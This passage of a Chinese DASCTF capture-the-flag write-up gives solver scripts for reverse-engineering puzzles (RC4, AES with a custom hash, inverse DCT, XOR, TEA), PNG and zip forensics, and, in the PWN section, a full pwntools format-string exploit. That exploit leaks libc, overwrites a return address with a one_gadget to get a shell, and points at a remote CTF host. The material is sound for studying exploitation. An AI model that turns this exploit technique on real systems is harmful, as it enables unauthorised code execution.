3b,0xc4,0x83,0x3f,0x72,0x60,0xc3,0xeb,0xa5,0x52,0x97,0x69,0xdf,0xe6,0xe8,0xc0,0x87,0x2b,0x55,0x08,0x25,0xcc,0xb5,0xd3,0x6f,0xdf,0xce,0x27,0xc6,0x18,0x6b,0x86,0x49,0x51,0xe9,0x8d,0x38,0xed,0x71,0x9c,0xcc,0x1a,0xac,0x00,0x5f,0x6e,0xed,0x27,0x00,0xb4,0xc4,0x1e,0xba,0xd1,0x87,0x22,0xce,0x5c,0x23,0xc7,0x3f,0x46,0xaa,0x25,0x15,0x62,0xa9,0x43,0x41,0xb1,0x32,0xae,0x8d,0x07,0x1f,0xe8,0x3b,0x70,0xd2,0x22,0x7b,0x3e,0xc3,0x4b,0x20,0x34,0x14,0xe8,0x89,0x99,0x23,0x25,0x1e,0x92,0x91,0x96,0xf5,0x22,0xb9,0x9c,0x1c,0x3d,0x02,0xa1,0xb9,0xb0,0x9b,0x86,0x5c,0x9a,0x29,0x80,0x2f,0xd9,0x93,0x7d,0xe3,0xd7,0xee,0x8d,0x42,0xeb,0x5a,0xc1,0xab,0x7f,0x19,0xe0,0x87,0xbf,0x4e,0x8c,0x39,0xb6,0x96,0x45,0x2e,0xa2,0x12,0xb0,0xe1,0x7a,0xc4,0xf3,0x67,0xd8,0x0f,0x1d,0x83,0x11,0xaf,0x5b,0x0a,0x98,0x69,0x06,0x7f,0xfd,0xdb,0xc1,0x0c,0x44,0xed,0x62,0x75,0xf5,0xe3,0x70,0x5d,0x19,0x55,0x15,0x5f,0xb7,0xdf,0x92,0xfe,0x28,0xeb,0x9c,0x1a,0x22,0xdf,0xec,0x98,0xd6,0xc2,0x62,0x5e,0x74,0xd3,0x47,0x16,0xf4,0x4f,0xa3,0xdb,0x22,0x41,0xe8,0x7e,0x46,0x23,0x16,0xab,0x2c,0x74,0x47,0x67,0xcd,0x08,0x27,0x87,0x07,0xb3,0x3f,0xe5,0x32,0x11,0x05,0xeb,0x67,0xa7,0x64,0xd1,0x30,0xca,0x8e,0xe9,0x7f,0x38,0x81,0x7a,0x5f,0x2b,0x2b,0x11,0x29,0xb9,0x8d,0x9a,0xc7,0x90,0xaf,0xcd,0x5c,0xef,0x1b,0x1a,0xf9,0x5b,0xb5,0x5a,0xf6,0xc3,0x09,0x3c,0x71,0x30,0x2e,0x3a,0x06,0xda,0xaf,0x05,0x36,0x73,0xa1,0x19,0xcf,0x51,0xb2,0x15,0x39,0xe2,0x02,0xa5,0x76,0xb4,0x4a,0xba,0x69,0x5a,0x3e,0x89,0xc7,0x73,0xb3,0x3e,0x64,0xbb,0xd0,0xb1,0x8a,0xd1,0x17,0x0d,0x0c,0xf2,0x1b,0xf8,0x26,0xa1,0xc7,0xd6,0x83,0xe1,0x2b,0xf5,0x7c,0x4e,0x3e,0x5f,0x91,0x8c,0xa2,0x2d,0xc6,0x96,0xf2,0xd8,0x4a,0x52,0x58,0x25,0x2d,0x83,0x3c,0xd2,0x5e,0xf5,0xe2,0x1c,0xc0,0x93,0x06,0x4d,0x2c,0x38,0x02,0x66,0x56,0xd9,0x92,0x85,0x32,0x38,0xff,0xb8,0xaf,0x0b,0x35,0xad,0x28,0x80,0x7e,0xf0,0x8d,0x11,0xec,0x5b,0xfc,0x92,0xa1,0x17,0x35,0x1a,0x29,0x37,0x58,0x28,0x3c,0x0a,0xad,0xbc,0x6b,0xad,0x73,0xe0,0xa0,0xa4,0x11,0xbb,0x59,0xef,0x4a,0x48,0x49,0x09,0x9f,0x8c,0xb3,0xb8,0x70,0x95,0x1d,0x82,0x90,0x74,0xfe,0x57,0xd3,0xb4,0xce,0xd8,0xe0,0x20,0xb6,0x67,0x34,0x40,0x55,0x58,0x27,0x5f,0x3a,0x48,0xf6,0x52,0x6c,0xc3,0x29,0x20,0xe7,0xd3,0xef,0x4f,0x5a,0x50,0xa0,0x40,0x87,0x3e,0xcb,0xbd,0xce,0x8b,0x67,0x35,0x4f,0x34,0x74,0xb4,0x73,0x82,0x11,0x3c,0x75,0xb5,0x1d,0x2e,0xdd,0x4d,0x18,0xf3,0x48,0x10,0x4c,0x24,0x22,0x68,0x82,0xd6,0xb0,0xc3,0x72,0x74,0x1a,0xff,0x45,0x3e,0x30,0x84,0x14,0xea,0x43,0x64,0x93,0x83,0x85,0x10,0x92,0x6f,0x0d,0xda,0x8e,0xc1,0xde,0x08,0xdd,0x91,0xae,0xc1,0x76,0x17,0x69,0x46,0x5b,0xdc,0xc7,0x38,0x85,0x35,0xe6,0x43,0x01,0xf3,0x73,0xda,0xf5,0xe3,0xf3,0xa5,0x7f,0xa9,0xa6,0x6f,0xb6,0xa2,0x7c,0x1d,0x9c,0xf1,0xc7,0x09,0x43,0x39,0xf8,0x66,0x4e,0x4a,0xba,0x2d,0x64,0x69,0x40,0x62,0xa0,0x35,0x39,0xac,0xec,0x74,0xf5,0x2b,0xb0,0xde,0x30,0x52,0x69,0xf9,0x87,0xe0,0xf5,0xf1,0x47,0xe2,0xc4,0x28,0x06,0x10,0x3d,0x96,0x70,0xab,0xd7,0x7a,0x8e,0x0f,0x5c,0x2f,0x3d,0x73,0xe0,0x20,0x01,0xea,0x7b,0xd6,0xc2,0x5a,0x9e,0xaf,0x52,0xb9,0x60,0xc5,0xbb,0xc4,0xde,0x99,0xbd,0xc9,0x18,0xa4,0x60,0xe9,0x00,0x86,0x41,0xda,0x85,0x46,0x0d,0x4a,0x9a,0xf0,0x93,0x9c,0x18,0x27,0xeb,0xf7,0x4d,0x46,0x00,0xe1,0xfd,0x64,0xc3,0x96,0xbc,0x60,0x68,0x29,0x14,0xb6,0xba,0xfc,0xfc,0xe9,0xac,0x65,0x82,0x47,0xb3,0x65,0x15,0xca,0xfd,0x8d,0x19,0x8c,0xfe,0xd9,0x83,0x2e,0x11,0xe7,0x42,0x53,0xb0,0xa2,0x61,0xbb,0xc5,0x70,0x3d,0xa8,0xbc,0x3b,0x65,0x4a,0x50,0xc2,0x5a,0x0d,0xd5,0xf2,0x84,0x0d,0x17,0x15,0x64,0x3d,0x82,0x7a,0x75,0x4e,0xa8,0xe1,0xf4,0x54,0x54,0x19,0xf6,0x99,0x42,0x97,0x93,0xce,0x78,0x2c,0x1e,0xf4,0x87,0x90,0xbf,0x72,0x60,0x01,0x0a,0x35,0x66,0xfa,0xcd,0x64,0x16,0x42,0x58,0x32,0xa5,0x4a,0xe4,0x6d,0x18,0x72,0xe1,0x5f,0x3c,0xe5,0x41,0x9d,0xba,0xdc,0x1e,0xe7,0x67,0x90,0x9d,0xfa,0xce,0x05,0x50,0x7b,0x85,0x32,0xd7,0x21,0x8c,0x78,0xcb,0x13,0x8a,0x92,0x55,0x56,0xf2,0x85,0xa4,0xac,0xcd,0x17,0xd3,0x27,0xd4,0x0a,0xd9,0x83,0xcf,0xfa,0x6d,0x6d,0x87,0xe8,0x9a,0xeb,0xaa,0x51,0x10,0xb4,0x9c,0x16,0xc5,0xaa,0x82,0x5c,0xfa,0x41,0x52,0x51,0xff,0x02,0xbe,0xb6,0xe7,0x0c,0xb3,0x9e,0x43,0xd4,0x2b,0x27,0x81,0xdb,0xcd,0x6f,0x4b,0xb7,0x5e,0x17,0x6a,0xd8,0x56,0xdc,0x34,0x9a,0x25,0x1b,0x7c,0x3a,0xb6,0x06,0x8e,0xc5,0x44,0x92,0x2a,0xbe,0xf2,0x3e,0xe5,0x7a,0x2b,0x20,0x36,0x4d,0x42,0xc2,0x08,0x05,0xf3,0x95,0x2f,0xfd,0x59,0xfe,0x31,0x71,0x2c,0x98,0xc7,0x3c,0x55,0xc9,0x9e,0xab,0x8e,0x35,0xd3,0x9f,0x2b,0x7f,0xf8,0x64,0x5a,0x19,0xf3,0xf7,0x46,0xb3,0xac,0xe8,0x2e,0x7f,0x30,0x85,0xd8,0x54,0xe2,0xbf,0x64,0xd6,0xff,0x97,0x80,0xe4,0xb8,0x4c,0xb4,0x97,0x2f,0x78,0x27,0x70,0xc6,0xbf,0x9a,0x53,0x33,0x19,0xfa,0xb0,0x14,0x3e,0x66,0xc3,0x21,0x16,0x81,0xe7,0xbc,0x05,0x12,0x83,0x59,0xe8,0x50,0xa9,0x0e,0x56,0x56,0xcd,0x68,0x37,0x60,0x67,0x13,0x27,0x30,0x2c,0x36,0xcd,0x53,0xde,0x13,0xd4,0xaf,0x70,0x74,0x41,0x83,0xbd,0xc4,0x0e,0x3c,0xac,0x54,0xe1,0xb1,0x2f,0x0c,0x54,0x95,0x90,0x6c,0xd7,0x08,0xb6,0x0e,0x41,0x76,0x6e,0xa4,0xab,0x91,0xd0,0x86,0xcb,0x02,0xca,0x29,0x1a,0xdc,0x10,0x7b,0x44,0x3f,0x5d,0xf2,0xc7,0xf3,0x0d,0x0f,0x12,0x40,0x16,0xf7,0x0d,0x77,0xb4,0x30,0xa3,0x7a,0xa7,0x4d,0xf1,0xb0,0x22,0x03,0xe5,0x76,0x0c,0xa2,0xc6,0x29,0x81,0xba,0x80,0x0a,0x8f,0x29,0x41,0x7c,0xb6,0x05,0x3d,0x18,0x84,0x66,0xe9,0x62,0x13,0x77,0x65,0x3a,0x26,0xf4,0xcf,0x26,0xbf,0x96,0xd7,0x4d,0x47,0xb4,0x03,0x5b,0x39,0x17,0x9e,0x33,0xce,0xc1,0xd6,0x24,0x2c,0x9c,0xfa,0x30,0xd8,0xa4,0xc8,0x80,0x50,0xb5,0xc4,0x33,0x62,0xac,0xe1,0x87,0x42,0xfa,0x11,0xc6,0xec,0x7b,0x3e,0x05,0x6a,0x5f,0xc2,0x27,0x3b,0x01,0x52,0xf4,0x5a,0xef,0xa8,0xee,0xa9,0x23,0xd4,0x0b,0x30,0xd2,0xeb,0x0c,0x40,0x69,0xdd,0x9b,0x91,0x85,0x64,0x9e,0x4e,0x6a,0x39,0xe9,0xea,0xc9,0x55,0xa5,0xd4,0x58,0xeb,0x3d,0x8e,0x8f,0x24,0x39,0x9e,0x8d,0xf3,0x19,0xfa,0x8c,0xad,0x39,0x18,0xde,0x11,0x34,0x05,0x4a,0xa3,0x58,0xba,0x84,0x46,0x67,0x30,0x86,0xb8,0x59,0x25,0xa8,0x24,0xec,0x9d,0xad,0x94,0xab,0xee,0xda,0xce,0x74,0xe9,0xc9,0x53,0x18,0x28,0x28,0x22,0x86,0x89,0x3d,0x39,0xe8,0xb5,0x0e,0xa3,0xa3,0xc4,0xa7,0x26,0x65,0xf2,0x98,0x5b,0x63,0x43,0x90,0x23,0xe0,0x95,0x59,0xcf,0x21,0xb5,0xd7,0x81,0xb3,0xdb,0x39,0xaa,0x63,0x46,0xdb,0x2a,0x56,0x64,0x56,0xa5,0x9a,0x39,0x60,0xea,0x59,0x8c,0xe8,0xa6,0x15,0x8a,0x70,0x28,0xd4,0x3c,0xdd,0xee,0x98,0x14,0x77,0xd8,0x50,0x43,0x05,0x39,0x1a,0x5a,0xfa,0x94,0x01,0x62,0xc3,0x24,0xf4,0xab,0x42,0xd9,0xe4,0x03,0x4d,0x4f,0xf7,0x9b,0xee,0x96,0xe2,0x7f,0xb4,0x60,0xdf,0x54,0x54,0x22,0x8c,0xb4,0xb5,0xa9,0x20,0xe9,0x43,0xcd,0x85,0x3a,0x86,0x3e,0xb6,0xcd,0x99,0xaa,0x9e,0x2d,0x69,0x9d,0xae,0x70,0xb3,0xb7,0x07,0x6e,0x5e,0x56,0x1f,0xa0,0x3d,0x65,0xa7,0x72,0x46,0xf9,0x94,0xe4,0xac,0x45,0x83,0x5d,0xa6,0x4b,0x03,0x68,0xb0,0xf8,0xed,0x37,0x30,0xbe,0xe5,0x84,0x6b,0xd4,0xbc,0x8c,0x79,0x43,0x08,0x20,0x4f,0x6b,0x5a,0x3c,0xcd,0x7d,0x99,0x80,0xe4,0xcb,0xda,0x2b,0x99,0x5d,0x39,0x14,0x1c,0x07,0xab,0x2a,0xd9,0x39,0x50,0xc0,0x04,0x48,0x35,0xd2,0x10,0xe5,0x67,0x7d,0x61,0xa1,0x68,0xbd,0x57,0x40,0xa1,0xd1,0xc8,0x9c,0x31,0x49,0x2d,0xe6,0x37,0x0f,0xaf,0x67,0x96,0xfa,0xb7,0xdd,0xfc,0xeb,0x56,0xd3,0x80,0x53,0xfc,0x09,0xe0,0x2d,0x2b,0x7a,0xed,0x7c,0x64,0x05,0xb0,0xd1,0x21,0x8f,0x85,0xcd,0x06,0x58,0x98,0x1e,0xe1,0xd5,0x71,0xc1,0x96,0x96,0xb9,0x3f,0xef,0x33,0xac,0x23,0xfa,0x7c,0x89,0xd7,0xc6,0xb7,0xe3,0x1c,0x51,0xb7,0xef,0xcf,0x6d,0x2a,0x74,0x21,0x13,0xa7,0xc3,0x7b,0x24,0xea,0x25,0xc4,0xe5,0x13,0x2d,0xa6,0x6f,0xe8,0xd0,0x8c,0xbb,0x75,0x1f,0x24,0x1d,0xd2,0x75,0xc4,0x62,0x46,0x95,0x4c,0xb9,0xe1,0x68,0x6a,0x69,0xfa,0x51,0xf2,0x4d,0x92,0x52,0xa7,0x83,0x9c,0x34,0x22,0x65,0xc8,0x43,0xba,0x8d,0xb9,0xcb,0x69,0x04,0xe8,0xd2,0xf6,0xe4,0xa7,0x15,0xc9,0x5b,0x79,0x65,0xe1,0xf2,0x06,0x06,0x0f,0xac,0x3b,0xe0,0x40,0x8d,0x45,0x34,0x22,0xa8,0x68,0xda,0xe2,0xe8,0x2e,0xc1,0x3c,0xd3,0x32,0xb8,0x25,0x98,0x1f,0x9f,0xcf,0xe0,0xd3,0xf4,0x11,0x19,0x15,0x9e,0x1a,0xb8,0xa3,0xb2,0x4c,0x8a,0x04,0x80,0x39,0x52,0x85,0xb7,0xec,0xab,0x57,0x4f,0xcb,0xa9,0x63,0x46,0x94,0xb0,0xfe,0x21,0x96,0xa0,0xeb,0x31,0xc7,0xdd,0xd5,0xcd,0xfe,0x48,0x7b,0x84,0xc2,0x77,0x8c,0x21,0x0d,0x8f,0x16,0xe4]  # Replace with your ciphertext as a byte array

plaintext = rc4_decrypt(key, ciphertext)
print(plaintext.hex())

用010生成一个dex文件进行分析

customHash 方法根据输入字符串生成一个 16 字节的哈希密钥。

encrypt 方法使用生成的密钥进行 AES 加密，返回base64加密后数据

import base64
from Crypto.Cipher import AES

def custom_hash(input_str):
    key_bytes = bytearray(16)
    temp = [0] * 16
    for char in input_str:
        char_val = ord(char)
        for j in range(16):
            temp[j] = ((temp[j] * 31) + char_val) % 251
    for i in range(16):
        key_bytes[i] = temp[i] % 256
    return bytes(key_bytes)

def decrypt(data, key):
    key_bytes = custom_hash(key)
    cipher = AES.new(key_bytes, AES.MODE_ECB)
    encrypted_bytes = base64.b64decode(data)
    decrypted_bytes = cipher.decrypt(encrypted_bytes)
    pad_len = decrypted_bytes[-1]
    decrypted_bytes = decrypted_bytes[:-pad_len]
    return decrypted_bytes.decode('utf-8')

key = "DSACTF"
ciphertext = "TwMkYUkg4bYsY0hL99ggYWnVjWyXQrWAdNmToB0eBXbS6wBzL6ktorjNWI9VOroTU4HgIUYyzGLpcHzd1zNGT+bFZZI7IoxJwpcgXfdwW1LSmiNSP+PuSUsqAzNclF1nJ07b4tYyLWg0zTypbzWsLhOIM+6uci3RFZLREUCALafi01M8mS+KMNxX1Pyn8mSP+KKKjQ5S5fasHRSn+L9qBFws0mWavpfI0QEiMgarxv0iGhYU8cfgonWyL70RvoXET5VUDP1vfYWIBLzzzaAqLC0OiMtUK3TTATSU7yijdgXm18OKMcGIke/NZIM6Sr5fL3t6psDOOkw2C/5uYrJVPn+D6U9KTL64bgREppDqMOvhvbhtuf/S3ASW/+rhtPMtoaD8FxDg0wWSLZA53fQfNA=="  # Replace with the Base64 encoded ciphertext

plaintext = decrypt(ciphertext, key)
print(plaintext)

最后由***cos((j + 0.5) * (i * pi) / v10)***可知是离散余弦变换

还原可得

import numpy as np
from scipy.fftpack import idct

data = [
    458.853181, -18.325492, -18.251911, -2.097520, -21.198660, -22.304648,
    21.103162, -5.786284, -15.248906, 15.329286, 16.919499, -19.669045,
    30.928253, -37.588034, -16.593954, -5.505211, 3.014744, 6.553616,
    31.131491, 16.472500, 6.802400, -78.278577, 15.280099, 3.893073,
    56.493581, -34.576344, 30.146729, 4.445671, 6.732204
]

def inverse_dct(data):
    return idct(data, norm='ortho')

recovered_signal = inverse_dct(data)

print("Recovered signal:", recovered_signal)

结果四舍五入转为字符可得flag

DosSnake

8086汇编代码分析

前面都是贪吃蛇游戏逻辑代码，只用分析这一段即可

si对应密文指针，di对应key指针，实现一个简单的异或

代码中只有这一段数据，推测既有密文也有密钥

exp：

enc = [0x3F, 0x09, 0x63, 0x34, 0x32, 0x13, 0x2A, 0x2F, 0x2A, 0x37, 0x3C, 0x23, 0x00, 0x2E, 0x20, 0x10, 0x3A, 0x27, 0x2F,0x24, 0x3A, 0x30, 0x75, 0x67, 0x65, 0x3C]

key = [0x44, 0x41, 0x53, 0x43, 0x54, 0x46]

def decrypt(enc, key):

decrypted_chars = []

for i in range(len(enc)):

decrypted_char = enc[i] ^ key[i % len(key)]

decrypted_chars.append(chr(decrypted_char))

decrypted_text = ''.join(decrypted_chars)

return decrypted_text

decrypted_text = decrypt(enc, key)

print("Decrypted text:", decrypted_text)

得到：Decrypted text: {H0wfUnnytheDosSnakeis!!!}

flag：

DASCTF{H0wfUnnytheDosSnakeis!!!}

Strangeprograme

上来对附件查壳发现存在.DASCTF段，直接跳到该处（loc_41D000），进行交叉引用，一直向上溯源到sub_413D50

查看sub_4111BD函数会发现其内部先定位到.DASCTF段，再进行了SMC，异或值为0xFF

直接下断点在SMC之后，在.DASCTF段内能发现加密和比较逻辑

脚本如下：

#include <stdio.h>
#include <stdint.h>
#include <stdio.h>
void decrypt2(uint32_t* v,uint32_t* a2) {
    uint32_t v0 = v[0], v1 = v[1], i;
    uint32_t v6 = 0;
    for (i = 0; i < 16; i++)
    {
        v6 -= 0x61C88647;
        v6 &= 0xffffffff;
    }
    for (i = 0; i < 16; i++)
    {
        v6 += 0x61C88647;
        v1 -= (a2[3] + (v0 >> 5)) ^ (v6 + v0) ^ (a2[2] + 16 * v0);
        v0 -= (a2[1] + (v1 >> 5)) ^ (v6 + v1) ^ (*a2 + 16 * v1);
    }
    
    v[0] = v0; v[1] = v1;
}
int main()
{
    uint32_t key[4] = {
        0x12345678,0x9101112,0x13141516,0x15161718
    };
    uint32_t array[10] = { 0xbc2b4df9,0x6213dd13,0x89fffcc9,0x0fc94f7d,0x526d1d63,0xe341fd50,0x97287633,0x6bf93638,0x83143990,0x1f2ce22c };
    uint32_t temp[2] = { 0,0 };
    int i = 0;
    temp[0] = array[0];
    temp[1] = array[1];
    for (i = 0; i < 5; i += 1)
    {
        for (int j = 0; j < 2; j++) {
            printf("0x%8x,",temp[j]);
        }
        decrypt2(temp, key);
        for (int j = 0; j < 2; j++) {
            printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));
        }
    }
    return 0;
}
data = [0xbc,0x2b,0x4d,0xf9,0x62,0x13,0xdd,0x13,0xde,0x77,0x0f,0x5d,0x1f,0x96,0x58,0x4b,0x3d,0x5d,0x4e,0x56,0x8d,0x34,0xbb,0x3f,0xb9,0xb7,0xa8,0xfd,0x46,0x96,0x24,0x12]
data2 = [0x83,0x14,0x39,0x90,0x1f,0x2c,0xe2,0x2c,0x97,0x28,0x76,0x33,0x6b,0xf9,0x36,0x38,0x52,0x6d,0x1d,0x63,0xe3,0x41,0xfd,0x50,0x89,0xff,0xfc,0xc9,0x0f,0xc9,0x4f,0x7d]
print(chr(0xbc^0x83))
print(chr(0x2b^0x14))
print(chr(0x4d^0x39))
print(chr(0xf9^0x90))
print(chr(0xf8^0xa9))
print(chr(0x1f^0x62))
flag = ''
for i in range(0,len(data)):
    flag += chr((data[i]^data2[i])&0xff)
print(flag)

#DASCTF{I4TH0ok_I5S0ooFunny_Isnotit?????}
#I_yn tons o0S5 nuFo 0HT4 I_ko

PWN

springboard

非栈上格式化字符串

import sys
from pwn import *
# from LibcSearcher import *
# from ctypes import *
context(arch='amd64', os='linux', log_level='debug')
# context(arch='i386' , os='linux', log_level='debug')
binary = './pwn'
libc = './libc.so.6'
host, port = "node5.buuoj.cn:28082".split(":")

print(('33[31;40mremote33[0m: (y)n'
    '33[32;40mprocess33[0m: (n)'))

if sys.argv[1] == 'y':
    r = remote(host, int(port))
else:
    r = process(binary)

# r = gdb.debug(binary)
# libc = cdll.LoadLibrary(libc)
libc = ELF(libc)
elf = ELF(binary)
# srand = libc.srand(libc.time(0)) #设置种子

default = 1
se      = lambda data                     : r.send(data)
sa      = lambda delim, data              : r.sendafter(delim, data)
sl      = lambda data                     : r.sendline(data)
sla     = lambda delim, data              : r.sendlineafter(delim, data)
rc      = lambda numb=4096                : r.recv(numb)
rl      = lambda time=default             : r.recvline(timeout=time)
ru      = lambda delims, time=default     : r.recvuntil(delims,timeout=time)
rpu     = lambda delims, time=default     : r.recvuntil(delims,timeout=time,drop=True)
uu32    = lambda data                     : u32(data.ljust(4, b''))
uu64    = lambda data                     : u64(data.ljust(8, b''))
lic     = lambda data                     : uu64(ru(data)[-6:])
padding = lambda length                   : b'Yhuan' * (length // 5) + b'Y' * (length % 5)
lg      = lambda var_name                 : log.success(f"{var_name} ：0x{globals()[var_name]:x}")
prl     = lambda var_name                 : print(len(var_name))
debug   = lambda command=''               : gdb.attach(r,command)
it      = lambda                          : r.interactive()


'''
aaaaaaaa-0x601089-0x40-0x7ffff78f7360-0x7ffff7ff7700-0x13-0x7fffffffddc0-(nil)-0x400840-0x7ffff7820840
00:0000│  0x7fffffffddc0 —▸ 0x7fffffffe2b7 ◂— 'SSH_AUTH_SOCK=/run/user/1000/keyring/ssh'
00:0000│  0x7ffff7820840 (__libc_start_main+240) ◂— 0x31000197f9e8c789
'''
# debug('b * 0x400825')

pl = b'%6$p-%9$p'
sla(b'Please enter a keywordn',pl)
ru("0x")
stack = int(rc(12),16) #0x7fffffffddc0 - 0x7fffffffdce8
ru("-0x")
libcbase = int(rc(12),16) - 240 - libc.sym['__libc_start_main']
system = libcbase + libc.sym['system'] 
lg('stack')
lg('libcbase')
stack1 = stack - (0x7fffffffddc0 - 0x7fffffffdce8)
lg("stack1")
pause()
ogg = [0x4527a,0xf03a4,0xf1247]
og = libcbase + ogg[2]
lg('og')
lg('system')

sla('Please enter a keywordn','%'+str(stack1&0xffff)+'c%11$hn')
sla('Please enter a keywordn','%'+str(og&0xffff)+'c%37$hn')
sla('Please enter a keywordn','%'+str((stack1+2)&0xffff)+'c%11$hn')
sla('Please enter a keywordn','%'+str((og>>16)&0xff)+'c%37$hhn')
it()
DASCTF{6e2f9ecb-e383-4df4-8b77-017cd655b37b}

非栈上格式化字符串

DASCTF{6e2f9ecb-e383-4df4-8b77-017cd655b37b}

MISC

png_master

考察你对于png的理解

Assess your understanding of PNG

文件尾解base64

Congratulations on finding the first paragraph of flag, but the understanding of png is just beginning.

flag1:DASCTF{2fd9e9ff-e27

仔细看图片，可以发现

每4个像素一组，有一组是A通道比较明显的

拆成四个图片再读取也行，直接上stegsolve读取也行

d-5405-c5f5-

zsteg会提示png最后有额外块

789c也是zlib的标志头

from PIL import Image
image = Image.open('flag.png')
image.save('copy.png')

读取再保存，可以发现最后的块没有了，说明这个块确实不正常

把这个块拿来当成另一个图片处理

补文件头，文件尾，

然后进行宽高的爆破，结果是500x500

DASCTF{2fd9e9ff-e27d-5405-c5f5-a19131f86216}

EZ_zip

直接打开附件报错，提示为不可预料的压缩文件末端

010查看文件末端

有just a byte的提示，推测是把这几个字节换成一个字节，应该需要遍历

但是写完遍历脚本生成289个压缩包文件也还是都不行，可能哪里还有问题

而且用压缩软件打开仅显示320.zip，但从16进制流中看出应该还有319.zip，推测内部可能还有多层压缩包嵌套

修复flag zip，010可以发现comment段被截断了

参照着DirEntry改动record段

改deFileNameLength为7，再把COMPTYPE deCompression改成一致（8）

然后根据comment提示，用字节形式的密码来爆破

python测了半天没成功，用hashcat验证一下猜想

确实是byte形式的密码

得到AES-ECB.txt

64ZpNmbv2Hg4Jj9bH8Kv6D3OBliD9hgyI3vZWfMDJs2TcEwVnBmH/zkBtPBE3g8e

the key may be on your journey？

再返回去处理输出的key

一共640个字符的hex，可以发现每64一组就刚好，而且每组一样

经测试，从0到320为正确方向

所以AES key为

c64e5e2225444a9da66b0f28ad718f798cffa70a48124ec5873a610c5899bb11

DASCTF{514755c6-8280-463c-8378-a29702fc88df}